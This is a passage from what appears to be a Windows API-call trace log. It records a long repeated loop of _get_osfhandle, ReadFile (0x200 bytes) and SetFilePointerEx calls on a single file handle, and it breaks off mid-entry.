[0092.933] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.933] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.933] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.933] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.933] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.933] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.933] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.933] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.933] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.933] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.933] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.933] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.933] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.933] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.933] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.933] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.933] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.933] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.933] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.933] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.933] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.933] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.933] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.934] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.934] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.934] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.934] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.934] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.934] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.934] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.934] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.934] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.934] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.934] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.934] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.934] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.934] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.934] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.934] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.934] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.934] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.934] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, 
lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.934] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.934] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.934] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.934] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.935] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.935] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.935] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.935] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.935] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.935] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.935] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.935] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.935] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.935] _get_osfhandle (_FileHandle=4) returned 0x54 
[0092.935] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.935] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.935] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.935] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.935] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.935] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.935] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.935] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.935] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.935] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.935] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.935] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.935] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.936] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.936] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.936] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.936] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.936] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.936] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.936] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.936] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.936] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.936] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.936] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.936] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.936] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.936] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.936] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, 
lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.936] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.936] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.936] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.936] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.936] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.936] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.936] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.937] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.937] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.937] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.937] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.937] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.937] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.937] 
_get_osfhandle (_FileHandle=4) returned 0x54 [0092.937] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.937] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.937] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.937] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.937] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.937] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.937] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.937] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.937] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.937] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.937] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.937] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.937] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 
[0092.937] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.937] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.937] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.938] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.938] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.938] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.938] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.938] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.938] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.938] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.938] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.938] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.938] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.938] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.938] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.938] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.938] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.939] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.939] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.939] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.939] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.939] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.939] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.939] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.939] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.939] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.939] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.939] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.939] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.939] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.939] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.939] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.939] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.939] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.939] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.939] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.939] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.939] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.939] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.939] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.940] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.940] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, 
lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.940] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.940] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.940] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.940] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.940] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.940] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.940] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.940] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.940] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.940] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.940] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.940] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.940] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: 